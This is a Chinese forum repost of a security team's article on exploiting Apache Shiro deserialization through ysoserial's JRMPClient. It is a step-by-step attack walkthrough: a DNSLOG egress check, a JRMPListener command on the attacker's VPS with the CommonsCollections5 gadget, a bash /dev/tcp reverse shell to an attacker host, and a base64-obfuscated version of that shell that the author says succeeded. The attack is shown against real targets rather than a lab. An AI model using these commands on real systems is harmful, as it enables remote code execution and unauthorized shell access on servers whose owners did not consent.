|
|
本帖最后由 wangqiang 于 2022-11-23 10:22 编辑
shiro反序列漏洞中JRMPClient利用
原创 xxlm Tide安全团队 2022-11-22 17:03 发表于湖南
转载自:shiro反序列漏洞中JRMPClient利用
前言
最近在测试中遇到一些shiro反序列化不能利用的情况 找到key 无法找到利用链,但是发现存在JRMPClient可用的情况
使用JRMPClient模块进行测试
找到一个同样存在shiro反序列的目标。
搭建JRMPClient 监听服务
首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服务,下载地址:https://github.com/frohoff/ysoserial
使用DNSLOG进行检测
在不确定目标是否通外网的情况下 先使用DNSLOG进行检测 获取一个新的域名 :w3dh1h.dnslog.cn
VPS上开启JRMPListener
在VPS上搭建服务命令
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"
shiro反序列利用工具中选择JRMPClient,然后输入VPS上搭建服务的地址:
JRMPListener 收到返回信息
DNSLOG上收到目标的ping 命令信息 说明目标服务器通外网
执行反弹命令
执行反弹命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1
没有收到反弹链接
将命令进行base64编码
- java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"
成功收到反弹链接
END
|
|
发表于 2022-11-23 10:20:06